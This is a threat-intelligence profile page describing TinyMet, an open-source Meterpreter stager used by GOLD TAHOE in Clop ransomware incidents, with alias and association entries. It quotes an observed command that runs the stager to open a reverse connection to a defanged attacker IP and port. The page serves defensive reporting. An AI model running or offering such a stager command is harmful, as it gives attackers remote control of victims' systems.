Tinymet

Malware updated a month ago (2024-11-29T13:43:20.994Z)
Download STIX
Preview STIX
TinyMet is a type of malware, specifically a tiny, flexible Meterpreter stager, that can infiltrate systems and cause significant damage. It has been used by threat actors like GOLD TAHOE to retrieve the TinyMet Meterpreter stager in Clop ransomware incidents. This harmful program can infect your system through suspicious downloads, emails, or websites and once inside, it can steal personal information, disrupt operations, or even hold your data hostage for ransom. The malware was observed being executed with the command c:\intel\wsus.exe 1 91.214.124[.]20 43434, indicating a reverse HTTP connection, and connected to a malicious IP address by either renaming a binary or providing specific arguments. The investigation into these incidents revealed that the threat actor has a possible link to the TinyMet Payload v0.2. This payload was previously used by Clop Ransomware as a precursor for the TA505 Post-Exploitation Operation. The use of this payload indicates a sophisticated level of attack planning and execution, suggesting that the threat actors are experienced and highly skilled. Our team discovered a file named wsus.exe, which appears to be a version of TinyMet, along with three additional files that were created and executed on the first compromised system. This file primarily operates as a version of TinyMet—an open-source Meterpreter stager—but the actors also have the option to store and execute any binary loaded into the table. This flexibility allows the threat actors to adapt their approach based on the specific vulnerabilities of the targeted system.
Description last updated: 2024-03-05T19:34:47.952Z
What's your take? (Question 1 of 3)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at. Create a free account to see the source evidence for each alias, and help fix any errors.
Alias DescriptionVotes
Meterpreter is a possible alias for Tinymet. Meterpreter is a type of malware that acts as an attack payload within the Metasploit framework, providing threat actors with an interactive shell to control and execute code on a compromised system. The malware is often deployed covertly through suspicious downloads, emails, or websites. Once insta
2
Meterpreter Stager is a possible alias for Tinymet. The Meterpreter stager is a type of malware, which is malicious software designed to infiltrate and exploit computer systems. It can enter your system through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it has the potential to steal personal information, di
2
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Ransomware
Analyst Notes & Discussion
Be the first to leave your mark here! Log in to share your views and vote.
Associated Malware
To see the evidence that has resulted in these malware associations, create a free account
Alias DescriptionAssociation TypeVotes
The Clop Malware is associated with Tinymet. Clop, a malicious software (malware), is linked to a Russian-speaking cybercriminal group also known as Cl0p. It is designed to exploit and damage computer systems by stealing personal information, disrupting operations, or holding data hostage for ransom. In May 2023, the Clop group began exploitinUnspecified
2
Source Document References
Information about the Tinymet Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more